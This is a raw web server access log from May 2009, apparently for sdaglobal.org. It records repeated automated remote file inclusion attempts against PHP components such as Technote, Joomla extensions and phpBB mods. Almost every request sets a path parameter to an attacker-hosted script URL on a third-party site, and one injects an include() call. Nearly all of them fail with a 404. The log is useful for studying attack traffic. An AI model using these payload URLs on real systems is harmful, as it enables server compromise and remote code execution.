67.212.165.114 - - [31/May/2009:10:31:00 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 375
67.212.165.114 - - [31/May/2009:10:31:30 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 375
67.212.165.114 - - [31/May/2009:10:31:35 -0400] "GET /log/sdaglobal.org-access_log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 377
61.81.17.108 - - [31/May/2009:10:31:42 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 333
61.81.17.108 - - [31/May/2009:10:31:43 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 366
61.81.17.108 - - [31/May/2009:10:31:43 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 337
221.139.104.104 - - [31/May/2009:10:32:22 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 346
221.139.104.104 - - [31/May/2009:10:32:22 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350
221.139.104.104 - - [31/May/2009:10:32:22 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 377
221.139.104.104 - - [31/May/2009:10:32:23 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
221.139.104.104 - - [31/May/2009:10:32:23 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
221.139.104.104 - - [31/May/2009:10:32:25 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350
221.139.104.104 - - [31/May/2009:10:32:25 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 346
221.139.104.104 - - [31/May/2009:10:32:25 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 377
221.139.104.104 - - [31/May/2009:10:32:47 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 375
221.139.104.104 - - [31/May/2009:10:32:51 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
85.18.117.101 - - [31/May/2009:10:33:32 -0400] "GET //includes/functions_mod_user.php?phpbb_root_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 313
85.18.117.101 - - [31/May/2009:10:33:32 -0400] "GET /log//includes/functions_mod_user.php?phpbb_root_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 317
200.142.148.142 - - [31/May/2009:10:33:41 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
200.142.148.142 - - [31/May/2009:10:33:41 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 379
200.142.148.142 - - [31/May/2009:10:33:46 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
200.142.148.142 - - [31/May/2009:10:33:46 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
83.103.72.130 - - [31/May/2009:10:34:03 -0400] "GET /log/sdaglobal.org-access_log.4//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 337
200.142.148.142 - - [31/May/2009:10:34:08 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
200.142.148.142 - - [31/May/2009:10:34:18 -0400] "GET /log/sdaglobal.org-access_log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
66.232.145.41 - - [31/May/2009:10:34:52 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
66.232.145.41 - - [31/May/2009:10:34:56 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
66.232.145.41 - - [31/May/2009:10:34:57 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
66.232.145.41 - - [31/May/2009:10:34:57 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
122.117.184.187 - - [31/May/2009:10:35:09 -0400] "GET /images/chinese.gif HTTP/1.1" 304 -
122.117.184.187 - - [31/May/2009:10:35:09 -0400] "GET /images/china.gif HTTP/1.1" 304 -
66.232.145.41 - - [31/May/2009:10:35:13 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
221.139.104.104 - - [31/May/2009:10:35:14 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
221.139.104.104 - - [31/May/2009:10:35:14 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
66.232.145.41 - - [31/May/2009:10:35:19 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
66.232.145.41 - - [31/May/2009:10:35:22 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
221.139.104.104 - - [31/May/2009:10:35:30 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
66.232.145.41 - - [31/May/2009:10:35:39 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
67.212.165.114 - - [31/May/2009:10:35:53 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346
67.212.165.114 - - [31/May/2009:10:35:53 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350
67.212.165.114 - - [31/May/2009:10:35:53 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 377
67.212.165.114 - - [31/May/2009:10:35:53 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346
67.212.165.114 - - [31/May/2009:10:35:53 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 379
67.212.165.114 - - [31/May/2009:10:35:53 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350
67.212.165.114 - - [31/May/2009:10:36:00 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350
67.212.165.114 - - [31/May/2009:10:36:00 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346
67.212.165.114 - - [31/May/2009:10:36:00 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 377
66.232.145.41 - - [31/May/2009:10:36:18 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
66.232.145.41 - - [31/May/2009:10:36:21 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
67.212.165.114 - - [31/May/2009:10:36:54 -0400] "GET /log/sdaglobal.org-access_log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 377
66.232.145.41 - - [31/May/2009:10:36:57 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
209.200.8.89 - - [31/May/2009:10:37:58 -0400] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 338
209.200.8.89 - - [31/May/2009:10:37:59 -0400] "GET /log/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 342
85.18.117.101 - - [31/May/2009:10:38:04 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//includes/functions_mod_user.php?phpbb_root_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 346
66.232.145.41 - - [31/May/2009:10:38:33 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
66.232.145.41 - - [31/May/2009:10:38:35 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
66.232.145.41 - - [31/May/2009:10:38:44 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350
66.232.145.41 - - [31/May/2009:10:38:47 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 377
209.51.152.234 - - [31/May/2009:10:38:51 -0400] "GET /log/sdaglobal.org-access_log/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 337
66.232.145.41 - - [31/May/2009:10:38:58 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
66.232.145.41 - - [31/May/2009:10:39:15 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 375
67.212.165.114 - - [31/May/2009:10:39:58 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 375
61.81.17.108 - - [31/May/2009:10:39:59 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 366
218.146.231.193 - - [31/May/2009:10:40:18 -0400] "GET /log/sdaglobal.org-error_log.1//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 348
218.146.231.193 - - [31/May/2009:10:40:21 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 318
85.18.117.101 - - [31/May/2009:10:40:23 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//includes/functions_mod_user.php?phpbb_root_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 346
85.18.117.101 - - [31/May/2009:10:40:23 -0400] "GET /log/sdaglobal.org-access_log%20%20//includes/functions_mod_user.php?phpbb_root_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 344
218.146.231.193 - - [31/May/2009:10:40:23 -0400] "GET /log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 322
82.146.39.200 - - [31/May/2009:10:42:13 -0400] "GET /log/sdaglobal.org-error_log.4/errors.php?error=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 321
82.146.39.200 - - [31/May/2009:10:42:17 -0400] "GET /errors.php?error=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 291
82.146.39.200 - - [31/May/2009:10:42:17 -0400] "GET /log/errors.php?error=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 295
62.146.68.61 - - [31/May/2009:10:43:15 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 328
62.146.68.61 - - [31/May/2009:10:43:15 -0400] "GET /log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 332
62.146.68.61 - - [31/May/2009:10:43:28 -0400] "GET /log/sdaglobal.org-access_log.4//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 359
88.183.32.67 - - [31/May/2009:10:43:43 -0400] "GET /log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 344
88.183.32.67 - - [31/May/2009:10:43:43 -0400] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 340
61.81.17.108 - - [31/May/2009:10:45:07 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 366
61.81.17.108 - - [31/May/2009:10:45:23 -0400] "GET /log/sdaglobal.org-access_log.3//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 364
82.146.39.200 - - [31/May/2009:10:46:41 -0400] "GET /log/sdaglobal.org-error_log/errors.php?error=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 319
74.208.111.178 - - [31/May/2009:10:49:03 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 317
74.208.111.178 - - [31/May/2009:10:49:03 -0400] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 346
74.208.111.178 - - [31/May/2009:10:49:03 -0400] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321
123.143.98.5 - - [31/May/2009:10:49:47 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/convert/mvcw.php?step=1&vwar_root=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 330
209.51.152.234 - - [31/May/2009:10:49:48 -0400] "GET /log/sdaglobal.org-access_log.4/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 359
209.51.152.234 - - [31/May/2009:10:49:48 -0400] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 328
123.143.98.5 - - [31/May/2009:10:49:48 -0400] "GET /log/convert/mvcw.php?step=1&vwar_root=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 301
123.143.98.5 - - [31/May/2009:10:49:48 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 297
123.143.98.5 - - [31/May/2009:10:49:52 -0400] "GET /log/convert/mvcw.php?step=1&vwar_root=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 301
123.143.98.5 - - [31/May/2009:10:49:52 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 297
123.143.98.5 - - [31/May/2009:10:49:52 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/convert/mvcw.php?step=1&vwar_root=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 330
69.50.197.106 - - [31/May/2009:10:49:53 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 317
69.50.197.106 - - [31/May/2009:10:49:53 -0400] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321
69.50.197.106 - - [31/May/2009:10:49:53 -0400] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 346
209.51.152.234 - - [31/May/2009:10:49:59 -0400] "GET /log/sdaglobal.org-access_log.4/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 359
209.51.152.234 - - [31/May/2009:10:49:59 -0400] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 328
209.51.152.234 - - [31/May/2009:10:49:59 -0400] "GET /log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 332
209.51.152.234 - - [31/May/2009:10:50:05 -0400] "GET /log/sdaglobal.org-access_log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 357
209.51.152.234 - - [31/May/2009:10:50:12 -0400] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 328
69.50.197.106 - - [31/May/2009:10:50:14 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 317
69.50.197.106 - - [31/May/2009:10:50:15 -0400] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321
69.50.197.106 - - [31/May/2009:10:50:15 -0400] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 346
209.51.152.234 - - [31/May/2009:10:50:23 -0400] "GET /log/sdaglobal.org-access_log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 357
74.208.111.178 - - [31/May/2009:10:50:48 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 348
69.50.197.106 - - [31/May/2009:10:51:05 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 348
83.103.72.130 - - [31/May/2009:10:51:08 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320
83.103.72.130 - - [31/May/2009:10:51:08 -0400] "GET /log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 324
83.103.72.130 - - [31/May/2009:10:51:08 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 353
69.50.197.106 - - [31/May/2009:10:51:24 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 348
83.103.72.130 - - [31/May/2009:10:51:25 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320
83.103.72.130 - - [31/May/2009:10:51:25 -0400] "GET /log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 324
83.103.72.130 - - [31/May/2009:10:51:25 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 353
91.149.157.130 - - [31/May/2009:10:51:50 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 350
91.149.157.130 - - [31/May/2009:10:51:50 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 377
91.149.157.130 - - [31/May/2009:10:51:50 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 346
85.18.117.101 - - [31/May/2009:10:52:13 -0400] "GET //error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 291
85.18.117.101 - - [31/May/2009:10:52:13 -0400] "GET /log/sdaglobal.org-access_log//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 320
85.18.117.101 - - [31/May/2009:10:52:14 -0400] "GET /log//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 295
207.182.137.218 - - [31/May/2009:10:53:17 -0400] "GET /log/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 294
207.182.137.218 - - [31/May/2009:10:53:17 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 323
207.182.137.218 - - [31/May/2009:10:53:17 -0400] "GET /log/sdaglobal.org-access_log.4/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 321
207.182.137.218 - - [31/May/2009:10:53:17 -0400] "GET /index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 290
207.182.137.218 - - [31/May/2009:10:53:17 -0400] "GET /index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 290
207.182.137.218 - - [31/May/2009:10:53:17 -0400] "GET /log/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 294
218.146.231.193 - - [31/May/2009:10:53:31 -0400] "GET /log/sdaglobal.org-access_log.3//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 349
85.18.117.101 - - [31/May/2009:10:53:33 -0400] "GET /log/sdaglobal.org-access_log.1//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 322
207.182.137.218 - - [31/May/2009:10:54:10 -0400] "GET /log/sdaglobal.org-access_log.4/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 321
207.182.137.218 - - [31/May/2009:10:54:10 -0400] "GET /index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 290
207.182.137.218 - - [31/May/2009:10:54:12 -0400] "GET /log/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 294
219.77.139.150 - - [31/May/2009:10:54:16 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
207.182.137.218 - - [31/May/2009:10:54:36 -0400] "GET /index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 290
207.182.137.218 - - [31/May/2009:10:54:37 -0400] "GET /log/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 294
